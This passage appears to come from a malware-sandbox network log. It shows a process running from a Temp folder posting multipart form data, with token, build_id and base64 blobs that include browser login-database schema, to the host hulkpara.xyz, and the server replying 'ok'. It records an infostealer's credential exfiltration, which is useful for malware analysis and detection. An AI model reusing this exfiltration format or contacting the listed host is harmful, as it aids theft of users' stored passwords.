                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:43 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:13:43 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          12192.168.2.74973994.130.191.1684437416C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:43 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----5FCJE3OH47GV37Q9R1VS
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Content-Length: 55081
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:43 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 35 46 43 4a 45 33 4f 48 34 37 47 56 33 37 51 39 52 31 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 34 63 61 32 36 61 66 31 64 63 32 32 39 39 33 37 65 36 33 39 36 66 32 31 32 62 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 35 46 43 4a 45 33 4f 48 34 37 47 56 33 37 51 39 52 31 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 35 46 43 4a 45 33 4f 48 34 37 47 56 33 37 51 39 52 31 56 53 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------5FCJE3OH47GV37Q9R1VSContent-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------5FCJE3OH47GV37Q9R1VSContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------5FCJE3OH47GV37Q9R1VSCont
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:43 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:43 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:43 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:45 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:13:45 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:45 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          13192.168.2.74974094.130.191.1684437416C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:45 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----USR1N7QIEU37YUAS2V3W
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Content-Length: 142457
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:45 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 55 53 52 31 4e 37 51 49 45 55 33 37 59 55 41 53 32 56 33 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 34 63 61 32 36 61 66 31 64 63 32 32 39 39 33 37 65 36 33 39 36 66 32 31 32 62 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 55 53 52 31 4e 37 51 49 45 55 33 37 59 55 41 53 32 56 33 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 55 53 52 31 4e 37 51 49 45 55 33 37 59 55 41 53 32 56 33 57 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------USR1N7QIEU37YUAS2V3WContent-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------USR1N7QIEU37YUAS2V3WContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------USR1N7QIEU37YUAS2V3WCont
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:45 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                                                                                                                                                                                          Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
